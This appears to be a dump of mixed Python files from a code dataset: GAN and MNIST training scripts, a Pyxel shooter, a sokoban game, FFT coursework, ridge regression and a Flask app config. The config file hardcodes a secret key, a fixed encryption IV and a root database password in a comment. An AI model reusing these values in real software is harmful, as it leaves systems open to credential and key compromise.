self.history['train_D_loss'].append(d_loss)\r\n\r\n z_ = np.random.normal(0, 1, (batch_size, 1, 1, 100))\r\n g_loss, g_optim = sess.run([G_loss, G_optim], feed_dict={x: X_[start:end], z: z_, isTrain: True})\r\n self.history['train_G_loss'].append(g_loss)\r\n\r\n elapsed_time = time.time() - start_time\r\n\r\n d_loss_sum = sum(self.history['train_D_loss'])\r\n d_loss_len = len(self.history['train_D_loss'])\r\n d_loss_mean = d_loss_sum / d_loss_len\r\n\r\n g_loss_sum = sum(self.history['train_G_loss'])\r\n g_loss_len = len(self.history['train_G_loss'])\r\n g_loss_mean = g_loss_sum / g_loss_len\r\n\r\n print('epoch: {:03d}, train_D_loss: {:.3f}, train_G_loss: {:.3f}, time: {:.3f}[sec]'\r\n .format(epoch, d_loss_mean, g_loss_mean, elapsed_time))\r\n\r\n z_test = np.random.normal(0, 1, (25, 1, 1, 100))\r\n test_images = sess.run(G_z, {z: z_test, isTrain: False})\r\n size_figure_grid = 5\r\n fig, ax = plt.subplots(size_figure_grid, size_figure_grid, figsize=(5, 5))\r\n for i, j in itertools.product(range(size_figure_grid), range(size_figure_grid)):\r\n ax[i, j].get_xaxis().set_visible(False)\r\n ax[i, j].get_yaxis().set_visible(False)\r\n\r\n for k in range(size_figure_grid*size_figure_grid):\r\n i = k // size_figure_grid\r\n j = k % size_figure_grid\r\n ax[i, j].cla()\r\n ax[i, j].imshow(np.reshape(test_images[k], (64, 64)), cmap='gray')\r\n\r\n label = 'Epoch {0}'.format(num_epoch)\r\n fig.text(0.5, 0.04, label, ha='center')\r\n\r\n plt.show()\r\n\r\n\r\n\r\n\r\n # z_val = np.random.normal(0, 1, (len(X_val), 1, 1, 100))\r\n # val_d_loss = sess.run(D_loss, feed_dict={x: X_val, z: z_val, isTrain: False})\r\n # val_g_loss = sess.run(G_loss, feed_dict={x: X_val, z: z_val, isTrain: False})\r\n # self.history['val_D_loss'].append(val_d_loss)\r\n # self.hsitory['val_G_loss'].append(val_g_loss)\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n network = DCGAN()\r\n network.fit(num_epoch=30, batch_size=30)\r\n","sub_path":"DCGAN/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":8089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"652075964","text":"import pyxel\r\nfrom sound import *\r\nfrom gameobject import *\r\n\r\nclass Ship(GameObject):\r\n def __init__(self, x1, y1, x2, y2, image, bank_num):\r\n super().__init__(x1, y1, x2, y2, image, bank_num)\r\n\r\n # Свойства корабля\r\n self.min_speed = 0.4\r\n self.max_speed = 2\r\n self.acceleration = 0.2\r\n\r\n # Пули\r\n self.bullet_speed = 2\r\n self.bullets = []\r\n\r\n def shot(self):\r\n if len(self.bullets) <= 10: # Позволяем стрелять только 10 раз.\r\n self.bullets.append(Bullet(self, 2, 2))\r\n\r\n def bullets_fly(self):\r\n \"\"\" Данный метод занимается управлением пулями. \"\"\"\r\n for bullet in self.bullets:\r\n if bullet.y >= 0:\r\n temp_y = bullet.y\r\n bullet.delete()\r\n bullet.y = temp_y - self.bullet_speed\r\n else:\r\n self.bullets.__delitem__(self.bullets.index(bullet))\r\n bullet.delete()\r\n\r\n def draw_bullets(self):\r\n if self.bullets:\r\n for bullet in self.bullets:\r\n bullet.draw()\r\n\r\n def isCollided(self, obj): # Как же сделать столкновения? 0_o\r\n pass\r\n\r\nclass Player(Ship):\r\n def control(self): # Дописать ускорение\r\n if pyxel.btn(pyxel.KEY_LEFT) and self.x >= 0:\r\n self.x = self.x - 1\r\n if pyxel.btn(pyxel.KEY_RIGHT) and self.x <= 152:\r\n self.x = self.x + 1\r\n if pyxel.btn(pyxel.KEY_UP) and self.y >= 64:\r\n self.y = self.y - 1\r\n if pyxel.btn(pyxel.KEY_DOWN) and self.y <= 112:\r\n self.y = self.y + 1\r\n if pyxel.btnp(pyxel.KEY_SPACE):\r\n self.shot()\r\n\r\nclass Enemy(Ship):\r\n def __init__(self, App, x1, y1, x2, y2, image, bank_num):\r\n super().__init__(x1, y1, x2, y2, image, bank_num)\r\n App.enemy_ships.append(self)\r\n\r\n def shot(self):\r\n self.bullets.append(Bullet(self, 2, 2))\r\n\r\n def bullets_fly(self):\r\n \"\"\" Данный метод занимается управлением пулями. \"\"\"\r\n for bullet in self.bullets:\r\n if bullet.y <= 160:\r\n temp_y = bullet.y\r\n bullet.delete()\r\n bullet.y = temp_y - - self.bullet_speed\r\n else:\r\n self.bullets.__delitem__(self.bullets.index(bullet))\r\n bullet.delete()\r\n\r\nclass Bullet:\r\n def __init__(self, ship, x_shift, y_shift):\r\n self.y = ship.y + y_shift\r\n self.x = ship.x + x_shift\r\n self.draw()\r\n\r\n def delete(self):\r\n del self\r\n\r\n def draw(self):\r\n self.bullet = pyxel.rect(self.x, self.y, self.x, self.y - 1, 8)\r\n\r\nclass App:\r\n def __init__(self):\r\n pyxel.init(160, 120, fps=60, caption='Pixel Invaders')\r\n\r\n self.sound = Sound()\r\n\r\n self.debug = False\r\n self.pause = False # Че делац\r\n\r\n self.score = 0\r\n\r\n self.ship = Player(pyxel.height/ 1.5, pyxel.width / 1.5, 16, 16, \"assets/ship.png\", 1)\r\n\r\n self.enemy_ships = []\r\n\r\n e1 = Enemy(self, 0, 20, 16, 16, \"./assets/enemy1.png\", 2)\r\n e2 = Enemy(self, 20, 40, 16, 16, \"./assets/enemy1.png\", 2)\r\n e3 = Enemy(self, 40, 50, 16, 16, \"./assets/enemy1.png\", 2) \r\n\r\n pyxel.run(self.update, self.draw)\r\n\r\n def draw(self):\r\n \"\"\"\r\n Отрисовка всех игровых обьектов.\r\n \"\"\"\r\n # Background\r\n pyxel.image(0).load(0, 0, \"./assets/background_space.png\")\r\n pyxel.blt(0, 0, 0, 0, 0, 160, 160)\r\n\r\n # Статы\r\n pyxel.text(2, 2, \"Score: {score}\".format(score=self.score), 2)\r\n\r\n # Отрисовка элементов игрока\r\n self.ship.draw()\r\n self.ship.draw_bullets()\r\n\r\n # Отрисовка всех врагов и их пуль\r\n for enemy in self.enemy_ships:\r\n enemy.draw()\r\n enemy.draw_bullets()\r\n\r\n # Debug mode\r\n if self.debug:\r\n pyxel.text(2, 10, \"Mouse pos({x}, {y})\".format(x=pyxel.mouse_x, y=pyxel.mouse_y), 8)\r\n\r\n def update(self):\r\n \"\"\"\r\n Метод проверки и обработки различных событий.\r\n \"\"\"\r\n if self.pause:\r\n pass # Дописать\r\n\r\n self.ship.control() # Обработка управления кораблём\r\n self.ship.bullets_fly() # Рассчёт пуль\r\n\r\n # Рассчёт полета пуль врагов\r\n for enemy in self.enemy_ships:\r\n enemy.bullets_fly()\r\n\r\n # Вкл/выкл дебаг мода\r\n if pyxel.btn(pyxel.KEY_ALT) and pyxel.btnp(pyxel.KEY_D):\r\n if self.debug:\r\n self.debug = False\r\n else:\r\n self.debug = True\r\n\r\n # Вкл/выкл паузы\r\n elif pyxel.btnp(pyxel.KEY_P):\r\n if not self.pause:\r\n self.pause = True\r\n else:\r\n self.pause = False\r\n\r\nApp()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"497577973","text":"import numpy as np\r\nimport torch\r\nfrom torch.autograd import Variable\r\nx_data=[1.0,2.0,3.0]\r\ny_data=[2.0,4.0,6.0]\r\nw=Variable(torch.Tensor([1.0]),requires_grad=True) # a random guess to the value\r\n\r\n# our model (the forward pass)\r\ndef forward(x):\r\n return x*w\r\n\r\n#loss function\r\ndef loss(x,y):\r\n y_pred=forward(x)\r\n return (y_pred-y)*(y_pred-y)\r\n\r\n\r\nfor epoch in range(10):\r\n for x_val,y_val in zip(x_data,y_data):\r\n l=loss(x_val,y_val)\r\n l.backward()\r\n #print(\"\\tw.grad.data\",w.grad.data)\r\n print(\"\\tgrad:\",x_val,y_val,w.grad.data[0])\r\n w.data=w.data-0.01*w.grad.data\r\n #manually zero the gradients after updating weights\r\n w.grad.data.zero_()\r\n print(\"progress:\",epoch,'loss=',l.data[0])\r\n\r\n\r\nprint(\"predict (after training)\", \"4 hours\",forward(4).data[0])\r\n","sub_path":"backprop_and_autograd.py","file_name":"backprop_and_autograd.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"244211339","text":"import os\n\nSECRET_KEY = 'the beijing telecom research center'\n# If you want to switch databases,Here are two options(sqlite or mysql)\nSQLALCHEMY_DATABASE_URI = 'sqlite:///db.sqlite'\n# SQLALCHEMY_DATABASE_URI = 'mysql+mysqlconnector://root:123456@localhost:3306/cowrest'\nSQLALCHEMY_COMMIT_ON_TEARDOWN = True\nSQLALCHEMY_TRACK_MODIFICATIONS = True\n# Mysql config POOL_SIZE and POOL_TIMEOUT\n# SQLALCHEMY_POOL_SIZE=5\n# SQLALCHEMY_POOL_TIMEOUT=10\nbase_images_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), r\"test\")\nbatch_size = 100\nmodel = None\n# classes = []\nimg_size = (299, 299)\nnoveltyDetectionLayerName = \"fc1\"\nnoveltyDetectionLayerSize = 1024\nisCenterLoss = None\nisTripletLoss = None\nmin_predict = 95.00\nmax_video_size = 20000\niv = b'1234567890123456'","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"160416051","text":"from datetime import datetime, timedelta\nfrom functools import lru_cache\n\nfrom antifraud import apis\nfrom api.models import Invoice\nfrom api import utils\nfrom flask import request\n\n\ndef score(invoice, payment):\n s = 0\n\n for rule in utils.get_scoring_rules():\n if globals().get(rule[\"id\"])(payment, invoice, **rule[\"parameters\"]):\n s += float(rule[\"score\"])\n\n return s\n\n\ndef is_trust_location(payment, invoice):\n \"\"\"Country of card != Country of payer (get from IP).\"\"\"\n ip = request.remote_addr\n if not payment.payment_account:\n return True\n bin_code = payment.payment_account[:6] # get BIN from masked card number\n if not bin_code.isnumeric():\n return\n return apis.get_country_code_by_ip(ip) != apis.get_country_code_by_bin(bin_code) is not None\n\n\ndef is_normal_amount(payment, invoice, threshold=200):\n \"\"\"Amount of payment << or >> average amount of payment for the specific merchant.\"\"\"\n last_30_days_invoices = _get_related_invoices(invoice, 30)\n last_day_invoices = _get_related_invoices(invoice, 1)\n\n amount_30 = sum(map(lambda i: i.total_price, last_30_days_invoices))\n amount_1 = sum(map(lambda i: i.total_price, last_day_invoices))\n\n return float(amount_30 / 30) * (float(threshold) / 100.0) > amount_1\n\n\ndef is_normal_count(payment, invoice, threshold=200):\n \"\"\"Increasing count of transaction for one merchant.\"\"\"\n last_30_days_invoices = _get_related_invoices(invoice, 30)\n last_day_invoices = _get_related_invoices(invoice, 1)\n\n count_30 = len(last_30_days_invoices)\n count_1 = len(last_day_invoices)\n\n return float(count_30 / 30) * (float(threshold) / 100) < count_1\n\n\n@lru_cache()\ndef _get_related_invoices(invoice, days):\n merchant_id = utils.get_store(invoice.store_id).get(\"merchant_id\")\n stores = utils.get_merchant_stores(merchant_id)\n\n invoices = []\n for store in stores:\n invoices.extend(\n Invoice.query.filter(Invoice.store_id == store[\"id\"], Invoice.created > datetime.now() - timedelta(days=days)).all()\n )\n\n return invoices\n","sub_path":"antifraud/scoring.py","file_name":"scoring.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"42643067","text":"#######To clear the working memory###########\nfrom scipy.fftpack.basic import fft2\nfrom matplotlib.pyplot import title\ndef clearall():\n all = [var for var in globals() if var[0] != \"_\"]\n for var in all:\n del globals()[var]\n#############################################\n\nclearall()\n\n# imports necessary for this exercise \nimport re\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.fftpack import fft2, fftshift, ifft2\n\n\nSHOW_TITLE = True\nSAVE_IMAGE = True\n\n\n#--------------------------------------------------- \n# Question 1.1\n#--------------------------------------------------- \n# Function to read a pgm image from a file\ndef read_pgm(filename, byteorder='>'):\n \"\"\"Return image data from a raw PGM file as numpy array.\n\n Format specification: http://netpbm.sourceforge.net/doc/pgm.html\n\n \"\"\"\n with open(filename, 'rb') as f:\n buffer = f.read()\n try:\n header, width, height, maxval = re.search(\n b\"(^P5\\s(?:\\s*#.*[\\r\\n])*\"\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n])*\"\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n])*\"\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n]\\s)*)\", buffer).groups()\n except AttributeError:\n raise ValueError(\"Not a raw PGM file: '%s'\" % filename)\n return np.frombuffer(buffer,\n dtype='u1' if int(maxval) < 256 else byteorder+'u2',\n count=int(width)*int(height),\n offset=len(header)\n ).reshape((int(height), int(width)))\n \n# Function used in this computer exercise to display an images \ndef display_image(image, greyColor=False, title=\"Image\", vmin=0, vmax=255, extent=None, xlabel=None, ylabel=None):\n if greyColor:\n plt.imshow(image, plt.cm.gray, vmin=vmin, vmax=vmax, extent=extent)\n else:\n plt.imshow(image, vmin=vmin, vmax=vmax, extent=extent)\n if SAVE_IMAGE:\n plt.savefig('../output/' + title.replace(' ', '_') + '.png')\n if xlabel:\n plt.xlabel(xlabel)\n if ylabel:\n plt.ylabel(ylabel)\n plt.title(title)\n plt.show()\n\n\n#--------------------------------------------------- \n# Question 1.2\n#--------------------------------------------------- \n# Computes the sum of all the pixels of the input image\ndef sum_pixels(img):\n (width, height) = img.shape\n sum = 0\n for x in xrange(width):\n for y in xrange(height):\n sum += img[x, y]\n return sum\n\n# return the list of solutions (u, v) such as ft2D(u, v) = s\ndef solve_discret_equation_FT(ft2d, s):\n res = []\n for x in xrange(len(ft2d)):\n for y in xrange(len(ft2d[0])):\n if ft2d[x, y] == s:\n res.append((x, y))\n return res\n \n\n\n#--------------------------------------------------- \n# Question 1.3\n#--------------------------------------------------- \ndef power_spectrum_2D(ft2d, fx=None, fy=None):\n epsilon = np.finfo(float).eps\n if fx != None:\n res = np.zeros(len(ft2d[0]))\n for y in xrange(len(ft2d[0])):\n val = ft2d[fx, y]\n magnitudeSquare = val.imag * val.imag + val.real * val.real\n res[y] = np.log(magnitudeSquare + epsilon)\n return res\n\n if fy != None:\n res = np.zeros(len(ft2d))\n for x in xrange(len(ft2d)):\n val = ft2d[x, fy]\n magnitudeSquare = val.imag * val.imag + val.real * val.real\n res[x] = np.log(magnitudeSquare + epsilon)\n return res\n\n res = np.zeros(ft2d.shape)\n for x in xrange(len(ft2d)):\n for y in xrange(len(ft2d[0])):\n val = ft2d[x, y]\n magnitudeSquare = val.imag * val.imag + val.real * val.real\n res[x, y] = np.log(magnitudeSquare + epsilon)\n return res\n\n \n\ndef display_plot(x, y, title=\"Plot\", xlabel=\"x\", ylabel=\"y\", limits=[], lab=None):\n plt.figure()\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n if isinstance(y, list):\n for i in range(len(y)):\n plt.plot(x, y[i], label=lab[i])\n else:\n plt.plot(x, y, label=lab)\n plt.grid()\n if len(limits) > 0:\n plt.axis(limits)\n if SHOW_TITLE:\n plt.title(title)\n if SAVE_IMAGE:\n plt.savefig('../output/' + title.replace(' ', '_') + '.png')\n plt.plot(0, 35)\n plt.legend()\n plt.show()\n\n#--------------------------------------------------- \n# Question 1.9 and 1.10\n#--------------------------------------------------- \ndef from_value_to_index(input_vector, input_value) : \n#Return the index position in such a way, the vecteur value at this position is the closest to the inputValue \n temp = np.abs(input_vector - input_value) \n pos = np.argmin(temp) \n \n return pos\n\n\ndef questions1_6():\n path_wheel = \"../resource/wheele.pgm\"\n\n# Question 1.1\n img = read_pgm(path_wheel)\n (width, height) = img.shape\n # display_image(img, True)\n\n# Question 1.2\n ft2d = fft2(img)\n sum = sum_pixels(img)\n freqSol = solve_discret_equation_FT(ft2d, sum)\n\n# Question 1.3\n spectrum_2D = power_spectrum_2D(ft2d)\n# display_image(\n# spectrum_2D,\n# vmin = min(spectrum_2D.flatten()),\n# vmax = max(spectrum_2D.flatten()),\n# xlabel= 'u (frequency parameter of the Fourier transform)',\n# ylabel= 'v (frequency parameter of the Fourier transform)',\n# title = 'Spectrum of the wheele picture')\n\n\n# Question 1.4\n ft2d_shifted = fftshift(ft2d)\n spectrum_shifted_2D = power_spectrum_2D(ft2d_shifted)\n img_size = img.shape[0] * img.shape[1]\n\n display_image(spectrum_shifted_2D,\n vmin=min(spectrum_shifted_2D.flatten()),\n vmax=max(spectrum_shifted_2D.flatten()),\n extent=[- height / 2 + 1, height / 2 + 1, - width / 2 + 1, width / 2 + 1],\n xlabel= 'u (frequency parameter of the Fourier transform)',\n ylabel= 'v (frequency parameter of the Fourier transform)',\n title = 'Spectrum of the wheele picture (shifted)')\n\n\n# Question 1.6\n img_computed = ifft2(ft2d)\n img_computed = img_computed.astype(int)\n# display_image(img_computed, True)\n\nif __name__ == \"__main__\":\n # I moved questions 1.1-1.6 to separate function to work on the rest of questions\n questions1_6()\n\n path_chess = \"../resource/damierHV.pgm\"\n\n# Question 1.7\n img = read_pgm(path_chess)\n (width, height) = img.shape\n# display_image(img, True)\n\n# Question 1.8\n ft2d = fft2(img)\n ft2d_shifted = fftshift(ft2d)\n spectrum_shifted_2D = power_spectrum_2D(ft2d_shifted)\n img_size = img.shape[0] * img.shape[1]\n\n# display_image(spectrum_shifted_2D,\n# vmin=min(spectrum_shifted_2D.flatten()),\n# vmax=max(spectrum_shifted_2D.flatten()),\n# extent=[- height / 2 + 1, height / 2 + 1, - width / 2 + 1, width / 2 + 1],\n# xlabel= 'u (frequency parameter of the Fourier transform)',\n# ylabel= 'v (frequency parameter of the Fourier transform)',\n# title = 'Spectrum of the chess board picture')\n\n # print(\"min = \" + str(min(spectrum_shifted_2D.flatten())) + \", max = \" + str(max(spectrum_shifted_2D.flatten())))\n\n\n# from here i don't really understand WTF is going on\n\n# Question 1.9\n spectrum_y_0 = power_spectrum_2D(ft2d_shifted, fy=0)\n spectrum_y_6 = power_spectrum_2D(ft2d_shifted, fy=6)\n display_plot(range(-len(spectrum_y_0)/2, len(spectrum_y_0)/2),\n [spectrum_y_0, spectrum_y_6],\n xlabel = 'fx',\n ylabel = 'power spectrum',\n lab = ['Power spectrum with fy=0', 'Power spectrum with fy=fy0'])\n\n # for x in range(-40, -10):\n # spectrum_x_24 = power_spectrum_2D(ft2d_shifted, fx=-26)\n # display_plot(range(len(spectrum_x_24)), spectrum_x_24, title=\"fx = -\" + str(x))\n\n # spectrum_x_25 = power_spectrum_2D(ft2d_shifted, fx=-27)\n # display_plot(range(len(spectrum_x_25)), spectrum_x_25, title=\"fx = -27\") \n\n# Question 1.10\n spectrum_x_0 = power_spectrum_2D(ft2d_shifted, fx=0)\n spectrum_x_15 = power_spectrum_2D(ft2d_shifted, fx=15)\n\n display_plot(range(-len(spectrum_x_0)/2, len(spectrum_x_0)/2),\n [spectrum_x_0, spectrum_x_15],\n xlabel = 'fy',\n ylabel = 'power spectrum',\n lab =['Power spectrum with fx=0', 'Power spectrum with fx=fx0'])\n\n # for y in range(-40, -10):\n # spectrum_y = power_spectrum_2D(ft2d_shifted, fy=-26)\n # display_plot(range(len(spectrum_y)), spectrum_y, title=\"fy = -\" + str(y))\n\n # fx = -24,25\n # fy = 11,12\n\n\n\n\n\n\n\n","sub_path":"ImageAndSignalProcessing/lab/4/report/code/src/Frequency_Spatial_Scale.py","file_name":"Frequency_Spatial_Scale.py","file_ext":"py","file_size_in_byte":8760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"20232234","text":"import argparse\nfrom xrd_data_parser import parse_csv, parse_xrdml\nfrom refinement_parser import parse_refinement\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('csv', nargs='*', help='path to input files')\n\n args = parser.parse_args()\n\n for f in args.csv:\n\n print(\"PARSING: \", f)\n\n extension = f.split(\".\")[-1]\n\n if extension == \"csv\":\n system = parse_csv(f)\n\n elif extension == \"xrdml\":\n system = parse_xrdml(f)\n\n elif extension == \"lst\":\n print(f)\n system = parse_refinement(f)\n","sub_path":"beamteam-data-processing/workbench.py","file_name":"workbench.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"161333607","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom markupsafe import Markup\nfrom .lang.zh_cn import Lang\n\n\ndef build_toolbar(*args):\n btn = ['refresh', 'add', 'edit', 'del']\n btns = [x for x in args if x in btn]\n btnAttr = {\n 'refresh': ['javascript:;', 'btn btn-primary btn-refresh', 'fa fa-refresh', '', Lang['refresh']],\n 'add': ['javascript:;', 'btn btn-success btn-add', 'fa fa-plus', Lang['add'], Lang['add']],\n 'edit': ['javascript:;', 'btn btn-success btn-edit btn-disabled disabled', 'fa fa-pencil', Lang['edit'], Lang['edit']],\n 'del': ['javascript:;', 'btn btn-danger btn-del btn-disabled disabled', 'fa fa-trash', Lang['delete'], Lang['delete']],\n }\n\n html = []\n for k in btns:\n href, classs, icon, text, title = btnAttr[k]\n html.append('{4}'.format(\n href, classs, title, icon, text\n ))\n\n return Markup(' '.join(html))\n","sub_path":"website/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"88353792","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n# 载入数据集\nmnist = input_data.read_data_sets('MNIST_data', one_hot=True)\n\n# 每个批次的大小,一次性放入神经网络的数据数量,以矩阵的形式放入\n# 批次优化\nbatch_size = 100\n# batch_size = 100\n# 计算一共有多少个批次 //是整除的意思\nn_batch = mnist.train.num_examples // batch_size\n\n# 定义两个placehlder,None指的是可以是任意的值,根据传入的批次进行确定\nx = tf.placeholder(tf.float32, [None, 784])\ny = tf.placeholder(tf.float32, [None, 10])\nkeep_prop = tf.placeholder(tf.float32)\nlr = tf.Variable(0.001, dtype=tf.float32)\n# 增加隐藏层---优化\n# 创建一个简单的神经网络\n# W = tf.Variable(tf.zeros([784, 10]))\n# b = tf.Variable(tf.zeros([10]))\n# prediction = tf.nn.softmax(tf.matmul(x, W) + b)\n\nW1 = tf.Variable(tf.truncated_normal([784, 500], stddev=0.1))\nb1 = tf.Variable(tf.zeros([500]) + 0.1)\nl_1 = tf.nn.sigmoid(tf.matmul(x, W1) + b1)\nl1_keep = tf.nn.dropout(l_1, keep_prob=keep_prop)\n\nW2 = tf.Variable(tf.truncated_normal([500, 500], stddev=0.1))\nb2 = tf.Variable(tf.zeros([500]) + 0.1)\nl_2 = tf.nn.sigmoid(tf.matmul(l1_keep, W2) + b2)\nl2_keep = tf.nn.dropout(l_2, keep_prob=keep_prop)\n\nW3 = tf.Variable(tf.zeros([500, 10]))\nb3 = tf.Variable(tf.zeros([10]) + 0.1)\n# 输出层使用softmax函数做分类\nprediction = tf.nn.softmax(tf.matmul(l2_keep, W3) + b3)\n# 二次代价函数-----优化使用交叉熵\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=prediction))\n# loss = tf.reduce_mean(tf.square(y-prediction))\n# 梯度下降法-->可以修改学习率,可以更改为其他的优化方法\n# train = tf.train.GradientDescentOptimizer(0.2).minimize(loss)\n# AdamOptimizer一般使用比较低的学习率(使用1e-6~1e-4等),但是收敛的速度比GradientDecentOptimizer快\ntrain = tf.train.AdamOptimizer(lr).minimize(loss)\n\n# 初始化变量\ninit = tf.global_variables_initializer()\n\n# equal比较两个参数是否是一样的,相同返回True,不同返回False argmax求最大的值在那个位置(比如求预测的概率最大的数字在什么位置)\n# 结果存放在一个布尔型列表中\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(prediction, 1))\n\n# 求准确率 cast:转换类型,布尔型转换为浮点型\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nwith tf.Session() as sess:\n sess.run(init)\n # 迭代21个周期--->可以增加训练的轮数\n # for epoch in range(21):\n for epoch in range(100):\n # 每个周期一共训练的批次\n for batch in range(n_batch):\n sess.run(tf.assign(lr, 0.001 * (0.95 ** epoch)))\n batch_xs, batch_ys = mnist.train.next_batch(batch_size)\n sess.run(train, feed_dict={x: batch_xs, y: batch_ys, keep_prop: 1.0})\n acc = sess.run(accuracy, feed_dict={x: mnist.test.images, y: mnist.test.labels, keep_prop: 1.0})\n learning_rate = sess.run(lr)\n print('第', str(epoch + 1), '轮准确率:', acc, ' learning rate:', learning_rate)\n","sub_path":"tensorflow/test9.py","file_name":"test9.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"326389922","text":"# encoding: utf-8\n'''\n@Author: shuhan Wei\n@File: ridgeRegression.py\n@Time: 2018/8/24 11:16\n'''\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef loadDataSet(fileName):\n numFeat = len(open(fileName).readline().split('\\t')) - 1\n dataMat = []; labelMat = []\n fr = open(fileName)\n for line in fr.readlines():\n lineArr = []\n curLine = line.strip().split('\\t')\n for i in range(numFeat):\n lineArr.append(float(curLine[i]))\n dataMat.append(lineArr)\n labelMat.append(float(curLine[-1]))\n return dataMat, labelMat\n\n\n\"\"\"\n 函数说明:岭回归函数 w=(XT*X+lamI)-1 * XT*y \n Parameters:\n xMat - x数据集\n yMat - y数据集\n lam - 用户自定义参数\n Returns:\n ws - 回归系数\n\"\"\"\ndef ridgeRegres(xMat, yMat, lam=0.2):\n xTx = xMat.T * xMat\n denom = xTx + np.eye(np.shape(xMat)[1]) * lam\n if np.linalg.det(denom) == 0.0:\n print(\"The matrix is singular, cannot do inverse\")\n return\n ws = denom.I * (xMat.T * yMat)\n return ws\n\n\n\"\"\"\n 函数说明:测试岭回归\n Parameter:\n xArr - x数据集矩阵\n yArr - y数据集矩阵\n Returns:\n wMat - 回归系数矩阵,30组系数\n\"\"\"\ndef ridgeTest(xArr, yArr):\n xMat = np.mat(xArr); yMat = np.mat(yArr).T\n #对数据进行标准化处理\n yMean = np.mean(yMat, 0)\n yVar = np.var(yMat,0)\n yMat = yMat - yMean\n xMeans = np.mean(xMat,0) #行操作\n xVar = np.var(xMat, 0)\n xMat = (xMat - xMeans) / xVar\n numTestPts = 30 # 在30个不同lambda值下\n wMat = np.zeros((numTestPts, np.shape(xMat)[1])) #系数矩阵\n for i in range(numTestPts):\n ws = ridgeRegres(xMat, yMat, np.exp(i-10))\n wMat[i,:] = ws.T\n return wMat\n\n\"\"\"\n 函数说明:绘制回归系数与lambda关系曲线\n\"\"\"\ndef plotLambda(ridgeWeights):\n plt.rcParams['font.sans-serif'] = ['SimHei']\n plt.rcParams['axes.unicode_minus'] = False\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(ridgeWeights)\n ax_title_text = ax.set_title(u'log(lambada)与回归系数的关系')\n ax_xlabel_text = ax.set_xlabel(u'log(lambada)')\n ax_ylabel_text = ax.set_ylabel(u'回归系数')\n plt.setp(ax_title_text, size=20, weight='bold', color='red')\n plt.setp(ax_xlabel_text, size=10, weight='bold', color='black')\n plt.setp(ax_ylabel_text, size=10, weight='bold', color='black')\n plt.show()\n\n\nif __name__ == '__main__':\n abX, abY = loadDataSet('abalone.txt')\n ridgeWeights = ridgeTest(abX, abY)\n plotLambda(ridgeWeights)\n\n","sub_path":"Regression/ridgeRegression.py","file_name":"ridgeRegression.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"381638801","text":"#input\nprint(\"Welcome sokoban game. You need to pusb B into D to win. Eat * to remove all of walls\")\n\n\nmap_sokoban = {\n\"size_x\" : 8,\n\"size_y\" : 8\n}\n\nplayer = {\n \"x\" : 7,\n \"y\" : 0\n}\nboxes = [\n {\"x\": 1, \"y\": 1 },\n {\"x\": 2, \"y\": 2 },\n {\"x\": 3, \"y\": 3 }\n ]\n\ndestinations = [\n {\"x\" : 5, \"y\" : 7},\n {\"x\" : 4, \"y\" : 1},\n {\"x\" : 6, \"y\" : 5}\n]\n\nwalls = [\n {\"x\": 3, \"y\": 5},\n {\"x\": 6, \"y\": 7},\n {\"x\": 7, \"y\": 2},\n {\"x\": 2, \"y\": 8},\n {\"x\": 4, \"y\": 6},\n {\"x\": 2, \"y\": 2},\n {\"x\": 5, \"y\": 4},\n {\"x\": 1, \"y\": 3}\n]\n\nspecial_item= {'x':2,'y':4} \n\n\n#process\n#draw Map\nplaying = True\nspc = True\nwhile playing:\n for y in range(map_sokoban[\"size_y\"]):\n for x in range(map_sokoban[\"size_x\"]):\n \n box_is_here= False\n for box in boxes:\n if box[\"x\"] == x and box[\"y\"] == y:\n box_is_here = True\n\n\n player_is_here = False\n if x == player[\"x\"] and y == player[\"y\"]:\n player_is_here = True\n\n\n des_is_here = False\n for des in destinations:\n if des[\"x\"] == x and des[\"y\"] == y:\n des_is_here = True\n\n wall_is_here = False\n for wall in walls:\n if wall[\"x\"] == x and wall[\"y\"] == y:\n wall_is_here = True\n \n item_in_here = False\n if x == special_item[\"x\"] and y == special_item[\"y\"] :\n item_in_here = True\n\n\n if player_is_here:\n print(\"P \", end = \"\")\n elif box_is_here:\n print(\"B \", end = '')\n elif des_is_here:\n print(\"D \", end = \"\")\n elif wall_is_here:\n print(\"| \", end = \"\")\n elif item_in_here:\n 